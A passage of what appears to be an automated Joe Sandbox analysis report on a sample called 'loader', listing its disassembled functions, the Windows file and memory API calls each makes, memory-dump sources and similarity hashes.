                                                                                    • Opcode Fuzzy Hash: 036ab9513505a17285df9c0b70a40a2499bc05af2c9a37c0c7e39903daf691d3
                                                                                    • Instruction Fuzzy Hash: BC71EF71500B949EDB25DF70C8519E7B7EAAF15301F40492EF2AB87342DA326A88CF95
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00639A50,?,?,00000000,?,?,00638CBC,?), ref: 00639BAB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 8ac6c3581f92dcd6abda799e3dce265733deaf91ea431681ea884a6479774b6c
                                                                                    • Instruction ID: 6ffd6814b35086d33d5c17a0151133f6d850ddf970104fff035dfa7b584084fa
                                                                                    • Opcode Fuzzy Hash: 8ac6c3581f92dcd6abda799e3dce265733deaf91ea431681ea884a6479774b6c
                                                                                    • Instruction Fuzzy Hash: 21418B316043118BDB249F15E5844ABF7E7FBE4320F148A6DE89283360D7F0AD458EE1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00638289
                                                                                      • Part of subcall function 006313DC: __EH_prolog.LIBCMT ref: 006313E1
                                                                                      • Part of subcall function 0063A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0063A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$CloseFind
                                                                                    • String ID:
                                                                                    • API String ID: 2506663941-0
                                                                                    • Opcode ID: 8ddf4f00789701f4393405bee1199163ba9adfeb4ffc219f69ce05d44a534c5e
                                                                                    • Instruction ID: 9fec060450f580f2f9d6e3fd433d2b9e5e44691fcd20c2e9b2e35ed9853ff54e
                                                                                    • Opcode Fuzzy Hash: 8ddf4f00789701f4393405bee1199163ba9adfeb4ffc219f69ce05d44a534c5e
                                                                                    • Instruction Fuzzy Hash: FC4197719447589EDB20DBA0CC55AEAB7BAAF00304F4404EEF18AA7193EB755FC5CB90
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?), ref: 0063995F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 9be38a8bc598eac2283275eaad26ef83684eb85f3c5a0e8b643a9749f8724058
                                                                                    • Instruction ID: 4c54e8c8a22855ddcd3a7e7510aab404b97768b8a2a0e531c4a67ddecb1af83b
                                                                                    • Opcode Fuzzy Hash: 9be38a8bc598eac2283275eaad26ef83684eb85f3c5a0e8b643a9749f8724058
                                                                                    • Instruction Fuzzy Hash: 673102309443456FE7209F24CC86BDABB96BB04320F140B1DF9A1962D0D7F4A948CFE5
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000001,?,?,?,?,0063D343,00000001,?,?,?), ref: 0063A011
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: bb05d627ec96265d77453a747f9edce67a488d3facc693ee0fdf6f12a2ee456d
                                                                                    • Instruction ID: ab6912020ee8a88da56bcce84b7fcf57033c7f87319c6a2d5f1aed8393cb9aa6
                                                                                    • Opcode Fuzzy Hash: bb05d627ec96265d77453a747f9edce67a488d3facc693ee0fdf6f12a2ee456d
                                                                                    • Instruction Fuzzy Hash: 8B318F31208355AFDB18CF24D818BAAB7A7EF94715F04451DF9819B390CBB5AD48CBE2
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 006313E1
                                                                                      • Part of subcall function 00635E37: __EH_prolog.LIBCMT ref: 00635E3C
                                                                                      • Part of subcall function 0063CE40: __EH_prolog.LIBCMT ref: 0063CE45
                                                                                      • Part of subcall function 0063B505: __EH_prolog.LIBCMT ref: 0063B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    APIs
                                                                                    • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04FF66FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2189140272.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_4ff0000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 3902816426-0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0064B098
                                                                                      • Part of subcall function 006313DC: __EH_prolog.LIBCMT ref: 006313E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    APIs
                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00639E70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileTime
                                                                                    • String ID:
                                                                                    • API String ID: 1425588814-0
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00639F27,?,?,0063771A), ref: 006396E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000,-00000858,?,-00000858,00000000,00639C22,?,?,00000000,00000800,?), ref: 006397AD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00639EC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    APIs
                                                                                      • Part of subcall function 0063C27E: _wcslen.LIBCMT ref: 0063C284
                                                                                    • CreateDirectoryW.KERNELBASE(00000001,00000000,00000001,?,?,0063A175,?,00000001,00000000,?,?), ref: 0063A2D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2011010700-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 220839149369c8cfd4168b61c2d3adc7fb742a74cdec9b001d59c2af6fcaf4ef
                                                                                    • Instruction ID: 28b00c87ac176b5ba5b7b8c963dbfbf6bc4b5d16e43e7b16db12fdf957d9ab53
                                                                                    • Opcode Fuzzy Hash: 220839149369c8cfd4168b61c2d3adc7fb742a74cdec9b001d59c2af6fcaf4ef
                                                                                    • Instruction Fuzzy Hash: 0CF068326011156EDB212A256C06BAF377B8F81B73F144119FD14B7A91DF609D0985A4
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00635AC2
                                                                                      • Part of subcall function 0063B505: __EH_prolog.LIBCMT ref: 0063B50A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: ef5cdc6d07f4c175adf7e9afcd273c464769d3630e711562c44f771142262c31
                                                                                    • Instruction ID: 042af95aac3476a31421d0b32ca881a67ca3d478d9db64fa0974c9014999b714
                                                                                    • Opcode Fuzzy Hash: ef5cdc6d07f4c175adf7e9afcd273c464769d3630e711562c44f771142262c31
                                                                                    • Instruction Fuzzy Hash: C801AF308107A0DAE725EBB8C051BDDFBE5EF68304F51848DA55753682CFB41B08D7A6
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,0063A325,00000001,006370E6,?,0063A175,?,00000001,00000000,?,?), ref: 0063A501
                                                                                      • Part of subcall function 0063BB03: _wcslen.LIBCMT ref: 0063BB27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2048169685-0
                                                                                    • Opcode ID: 0372bbf23c2efe84df95a65cea8cb76c206ababc3b8213524b511ac03b8930e1
                                                                                    • Instruction ID: 52442ff83e824d0034f745cf6a10fa54c5a95d46b10a71f9fdf7a0cf78eb2dff
                                                                                    • Opcode Fuzzy Hash: 0372bbf23c2efe84df95a65cea8cb76c206ababc3b8213524b511ac03b8930e1
                                                                                    • Instruction Fuzzy Hash: 84F06D32250219BBDF015FA0DC45FDA376EBF04395F488065F989D62A0DB71DAD8EBA0
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0063977F,?,?,006395CF,00000000,00662641,000000FF), ref: 0063A1F1
                                                                                      • Part of subcall function 0063BB03: _wcslen.LIBCMT ref: 0063BB27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 3339486230-0
                                                                                    • Opcode ID: 44c6a3b79192c8787b0cc302f02f8a1dc0e67d3aa508b32622c5d74286871161
                                                                                    • Instruction ID: d6727e364f95e8efb7030b0ab484ef6028877fdbee58e184a39611f4ed5b2ded
                                                                                    • Opcode Fuzzy Hash: 44c6a3b79192c8787b0cc302f02f8a1dc0e67d3aa508b32622c5d74286871161
                                                                                    • Instruction Fuzzy Hash: 78E092311502196BDB415F60DC45FDA375EBB08381F484025B945D2150EB61DE88EAA4
                                                                                    APIs
                                                                                      • Part of subcall function 0063A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,0063A592,000000FF,?,?), ref: 0063A6C4
                                                                                      • Part of subcall function 0063A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,0063A592,000000FF,?,?), ref: 0063A6F2
                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0063A598
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$FileFirst$Close
                                                                                    • String ID:
                                                                                    • API String ID: 2810966245-0
                                                                                    • Opcode ID: 5eb133cd6aaac5748ea965405b7f21bfa8c3c6c1c510a0fc27d619be906734ab
                                                                                    • Instruction ID: cd34048ffe75d0370737baa8eba2b87d769198299fda03dac7389bfb4a62eb3d
                                                                                    • Opcode Fuzzy Hash: 5eb133cd6aaac5748ea965405b7f21bfa8c3c6c1c510a0fc27d619be906734ab
                                                                                    • Instruction Fuzzy Hash: 52F0A73140C790ABCB6257F48905BCB7B926F1A331F048A4DF1FD52196C3755099ABB3
                                                                                    APIs
                                                                                    • ___security_init_cookie.LIBCMT ref: 0064F530
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___security_init_cookie
                                                                                    • String ID:
                                                                                    • API String ID: 3657697845-0
                                                                                    • Opcode ID: 782a6d84ff551b70dd12fd652aaf6a6e882065f31a8d07acc15438d44750f5d9
                                                                                    • Instruction ID: 70796ebacb76a00aec37e8a9ca27eb47ae98711611af60fb44410b2a0c16c97e
                                                                                    • Opcode Fuzzy Hash: 782a6d84ff551b70dd12fd652aaf6a6e882065f31a8d07acc15438d44750f5d9
                                                                                    • Instruction Fuzzy Hash: D7E09A3290824A8ECF25EFD4D8027EDB7B3EB40325F1009B9E911236A28A321944CA59
                                                                                    APIs
                                                                                    • 739A6BB0.GDIPLUS(00000010), ref: 0064A62C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                    • Instruction ID: 9d491eea3b8152f14e37985ffbaed65e79d1019c339adcfaad6d8e7ce7ef51ef
                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                    • Instruction Fuzzy Hash: 4DD0C77125020976DF426FA18D1296E7597EB01344F048125B841D5152EAB1D910955A
                                                                                    APIs
                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0064DD92
                                                                                      • Part of subcall function 0064B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064B579
                                                                                      • Part of subcall function 0064B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B58A
                                                                                      • Part of subcall function 0064B568: IsDialogMessageW.USER32(00010406,?), ref: 0064B59E
                                                                                      • Part of subcall function 0064B568: TranslateMessage.USER32(?), ref: 0064B5AC
                                                                                      • Part of subcall function 0064B568: DispatchMessageW.USER32(?), ref: 0064B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 897784432-0
                                                                                    • Opcode ID: 81698c80cb279af68e0e3cadbb8a062c69143618434970d4011fbbe4abeeea42
                                                                                    • Instruction ID: c7cafd961b09865f5e17cb49705105a5833a2bb6002b223b11bdb138082bcd8c
                                                                                    • Opcode Fuzzy Hash: 81698c80cb279af68e0e3cadbb8a062c69143618434970d4011fbbe4abeeea42
                                                                                    • Instruction Fuzzy Hash: D6D09E31144300BAD7012B51CD06F0B7AE7AB88B08F005959B388740F1C6B29E61DB15
                                                                                    APIs
                                                                                    • GetFileType.KERNELBASE(?,006397BE), ref: 006398C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileType
                                                                                    • String ID:
                                                                                    • API String ID: 3081899298-0
                                                                                    • Opcode ID: 68b3636f5c44d2cd6b967085f7c7b6bacaf0bf56a22d557ed363fbdcebc4917c
                                                                                    • Instruction ID: 69b3eaed8b0a1d10959d3af05f148f244e43e3baa7aa2c4021c685edced8c851
                                                                                    • Opcode Fuzzy Hash: 68b3636f5c44d2cd6b967085f7c7b6bacaf0bf56a22d557ed363fbdcebc4917c
                                                                                    • Instruction Fuzzy Hash: 55C00234804115958E21562498454D5B713AF93365BB49F95D069852B1C372CC57EE61
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNELBASE(?,0063903E,?,?,-00000870,?,?,?,?,00000000,?,-00000974,?,?,?,?), ref: 00639F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: File
                                                                                    • String ID:
                                                                                    • API String ID: 749574446-0
                                                                                    • Opcode ID: e11eb8d6230db3b40b8751024726175cd2900f7c6a2ea18eefbea3fa3c9d6c49
                                                                                    • Instruction ID: 1e8d859598d1dda7e6d733065b7345dbd839a2ce31932e3d3bbe13cbba0f8ddd
                                                                                    • Opcode Fuzzy Hash: e11eb8d6230db3b40b8751024726175cd2900f7c6a2ea18eefbea3fa3c9d6c49
                                                                                    • Instruction Fuzzy Hash: FCA0113008802A8A8E002B30CA0800C3B22EB20BC830022A8A00ACA0A2CB22880B8B00
                                                                                    APIs
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?), ref: 0064AC08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    • Opcode ID: f810a86a7379052aae55617268adcfdd3e9a063fa2a13e69b9c669bc059f4062
                                                                                    • Instruction ID: f5683e5c96e73af3d3e74a075744add6a7e97a35bcf8ce513c9c20d7e957ce3b
                                                                                    • Opcode Fuzzy Hash: f810a86a7379052aae55617268adcfdd3e9a063fa2a13e69b9c669bc059f4062
                                                                                    • Instruction Fuzzy Hash: 25A011302002208BA3000B328F0AA0EBAAAAFA2B00F00C028A00080230CB30CC20AA00
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,006395D6,00000000,00662641,000000FF), ref: 0063963B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 7c1e44fbd0951943b6d4f48621ebe45eb1a02f0b0cbeeabe792c195a6043adbc
                                                                                    • Instruction ID: a3e54927eaf3feea843842a24a6fd66f73ce1c87d24658a9f47b4b81cb660490
                                                                                    • Opcode Fuzzy Hash: 7c1e44fbd0951943b6d4f48621ebe45eb1a02f0b0cbeeabe792c195a6043adbc
                                                                                    • Instruction Fuzzy Hash: A8F08970482B159FFB308A64C85A7D2B7EA6B13325F045B1ED0E742AE0D7A1698DCE90
                                                                                    APIs
                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00662641,000000FF), ref: 0064ACB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Uninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 3861434553-0
                                                                                    • Opcode ID: fc92c6227074a32b9672e076a1affa0b5be6de6dbfec37c5f8d079e1909244d1
                                                                                    • Instruction ID: 3a1cfa23a3f907f40a4a77cdd9328c98e8dd58657e0f007166e598cda104ab5e
                                                                                    • Opcode Fuzzy Hash: fc92c6227074a32b9672e076a1affa0b5be6de6dbfec37c5f8d079e1909244d1
                                                                                    • Instruction Fuzzy Hash: FFE06572544650EFC7009F58DC06B45FBAEFB48B20F00426AF416D3B60CB746D40CA94
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0082D5C3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 9f55dcedc4d8ffc018289f8495e68ca906b3d718993c7eccfc65d7d9a398bb67
                                                                                    • Instruction ID: 71c6e3ecd4939d022b00800b0213585057e094263e2ff7cfdbcc729da19fe4cd
                                                                                    • Opcode Fuzzy Hash: 9f55dcedc4d8ffc018289f8495e68ca906b3d718993c7eccfc65d7d9a398bb67
                                                                                    • Instruction Fuzzy Hash: 1EE0ECB5300218ABDB10CE4CEA44B6A37DDF748714F108021FA09D7245C274EC509765
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: __floor_pentium4
                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                    • API String ID: 4168288129-2761157908
                                                                                    • Opcode ID: 983cbcc1f7764cb71a39f81e4725f39e9806214ea0bd720b65340b048cb70be8
                                                                                    • Instruction ID: 9c84c9f39e9594dde18e31831ccb41b8936862da52d63a73528f84e01fa7d251
                                                                                    • Opcode Fuzzy Hash: 983cbcc1f7764cb71a39f81e4725f39e9806214ea0bd720b65340b048cb70be8
                                                                                    • Instruction Fuzzy Hash: F4C23B71E046298FDF69CE28DD407E9B7B6EB44306F1441EAD84DE7280E775AE898F40
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog_swprintf
                                                                                    • String ID: CMT$h%u$hc%u
                                                                                    • API String ID: 146138363-3282847064
                                                                                    • Opcode ID: 062eeaf6a95375a0c698f718bc104fdfbcab3f9738f14d7ff275c61117e0a78e
                                                                                    • Instruction ID: e185ef73edf5713f69a3339d582305150c27cda295f5251766f11dbb8962f84b
                                                                                    • Opcode Fuzzy Hash: 062eeaf6a95375a0c698f718bc104fdfbcab3f9738f14d7ff275c61117e0a78e
                                                                                    • Instruction Fuzzy Hash: 3532E371500394AFDB58DF74C896AE93BE6AF15300F04447DFD8A9B382DB709A49CBA4
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00632874
                                                                                    • _strlen.LIBCMT ref: 00632E3F
                                                                                      • Part of subcall function 006402BA: __EH_prolog.LIBCMT ref: 006402BF
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00632F91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                    • String ID: CMT
                                                                                    • API String ID: 1057911484-2756464174
                                                                                    • Opcode ID: 182304a537b4287b37ef1390e837b1619f62947bec34fb819a0f31751443875f
                                                                                    • Instruction ID: a0b65b5a5cdc17e83ff669f126c0e8e9d1faeb69598dbd61955f60ed14b1bb7a
                                                                                    • Opcode Fuzzy Hash: 182304a537b4287b37ef1390e837b1619f62947bec34fb819a0f31751443875f
                                                                                    • Instruction Fuzzy Hash: 026226715002458FDB19DF38C8967EA7BA2EF54300F08457EFC9A8B382DB759945CBA0
                                                                                    Memory Dump Source
